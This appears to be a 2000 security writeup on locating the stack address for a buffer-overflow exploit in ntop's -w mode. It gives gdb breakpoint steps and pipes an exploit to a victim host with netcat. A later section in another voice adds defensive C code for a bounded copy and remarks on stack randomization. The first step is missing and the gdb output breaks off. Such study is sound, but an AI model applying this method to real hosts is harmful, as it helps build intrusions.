NTop -w vulnerability as an example for finding ESPs
27 Oct. 2000
Summary
Many security vulnerabilities and exploits require whoever runs the exploit code (the attacker, or an administrator testing a system) to supply an ESP (Extended Stack Pointer) address. The region at ESP is used as the payload area, because that is where the overwritten return pointer will point. Once the address is provided, the exploit overflows the buffer and overwrites the return address with the given ESP address, so the program jumps to the ESP area, where an arbitrary set of commands is waiting.
Since ESP is not at exactly the same place in every version (each compiled build, UNIX flavor, etc.), it needs to be determined manually for every available version (it can sometimes be guessed, but the approach below is much quicker).
2. [On local host]
Run "tcpdump -w somefile" to produce a tcpdump capture file to feed to ntop, then copy it to the victim host.
3. [On victim host]
Execute the following with our modified ntop:
$ ./ntop -w 8080 -f somefile
---- The following will be shown ----
Warning: unable to read file '.ntop'. No security will be used!
Waiting for HTTP connections on port 8080...
----
4. [On victim host]
Run gdb, attach it to our ntop process, and set a breakpoint on the function returnHTTPPage.
$ gdb ./ntop 2634
(gdb) break returnHTTPPage
Breakpoint 1 at 0x8051350
(gdb) cont
Continuing.
[Switching to Thread 28851]
5. [On local host]
Run the exploit against the victim host:
$ ./ntop-w-exp | nc victim 8080
6. [On victim host]
gdb will stop at the returnHTTPPage breakpoint.
Then set a breakpoint on the function strcpy and continue; gdb will stop at the strcpy breakpoint. The value of "dest=0xbefffb00" is the stack location we will use as the ESP value.
---- The following will be shown ----
Breakpoint 1, 0x8051350 in returnHTTPPage ()
(gdb) break strcpy
Breakpoint 2 at 0x400c842a: file ../sysdeps/generic/strcpy.c, line 33.
(gdb) cont
Continuing.
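The strcpy stop in step 6 is where the request path is copied, unbounded, into a fixed-size stack buffer; the "dest" value gdb prints is simply that buffer's address, which is why it doubles as the ESP value. As an added example (my own code, not ntop's; the 64-byte buffer size, the function names and the "GET path HTTP/1.0" request format are assumptions), here is a handler of the same shape with the copy bounded, plus a helper that reports how far a given request would have overrun the buffer, which is the check a maintainer would run to confirm the fix:

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Size of the fixed stack buffer the request path lands in. Constructed
 * for this example; it is not ntop's real buffer size. */
#define PATH_BUF 64

/* Hypothetical hardened replacement for an unbounded strcpy() of the
 * request path: copies the token of src (up to the first space or NUL)
 * into dst, returning 0 on success and -1 if it would not fit, in which
 * case dst is left untouched. */
int copy_token_bounded(char *dst, size_t dst_len, const char *src)
{
    size_t n = strcspn(src, " ");          /* token ends at first space */
    if (n + 1 > dst_len)                   /* need room for the NUL too */
        return -1;
    memcpy(dst, src, n);
    dst[n] = '\0';
    return 0;
}

/* How many bytes past the end of a dst_len-byte buffer an unbounded
 * strcpy() of the path token in src would have written (0 if it fits).
 * Arithmetic only, nothing is copied, so it is safe to run as a check
 * on incoming requests or on captured request lines. */
size_t overflow_bytes(size_t dst_len, const char *src)
{
    size_t needed = strcspn(src, " ") + 1; /* token plus terminating NUL */
    return needed > dst_len ? needed - dst_len : 0;
}

/* Hypothetical request-line handler with the bounded copy in place.
 * Returns 1 if the request was accepted, 0 if rejected as oversized. */
int handle_request_line(const char *request_line)
{
    char path[PATH_BUF];   /* the stack buffer an unbounded strcpy() overran */
    const char *p = request_line;

    if (strncmp(p, "GET ", 4) == 0)
        p += 4;
    if (copy_token_bounded(path, sizeof path, p) != 0) {
        fprintf(stderr, "rejected: path exceeds buffer by %zu bytes\n",
                overflow_bytes(sizeof path, p));
        return 0;
    }
    printf("accepted path: %s\n", path);
    return 1;
}

/* Builds a constructed request line "GET /AAA... HTTP/1.0" whose path
 * token is exactly path_len bytes long (path_len >= 1). Caller frees it. */
char *make_request(size_t path_len)
{
    const char *tail = " HTTP/1.0";
    char *req = malloc(4 + path_len + strlen(tail) + 1);
    memcpy(req, "GET ", 4);
    req[4] = '/';
    memset(req + 5, 'A', path_len - 1);
    strcpy(req + 4 + path_len, tail);
    return req;
}

int main(void)
{
    char *big = make_request(100);         /* constructed oversized request */
    handle_request_line("GET /index.html HTTP/1.0");
    handle_request_line(big);
    free(big);
    return 0;
}
```

Two things worth noting for anyone maintaining a server like this: the bounded copy rejects the request instead of silently truncating it, so an oversized path shows up in the error log rather than disappearing; and on current systems the address this writeup recovers is not stable anyway, because stack address randomization and compiler stack protectors change or guard the buffer's location from run to run.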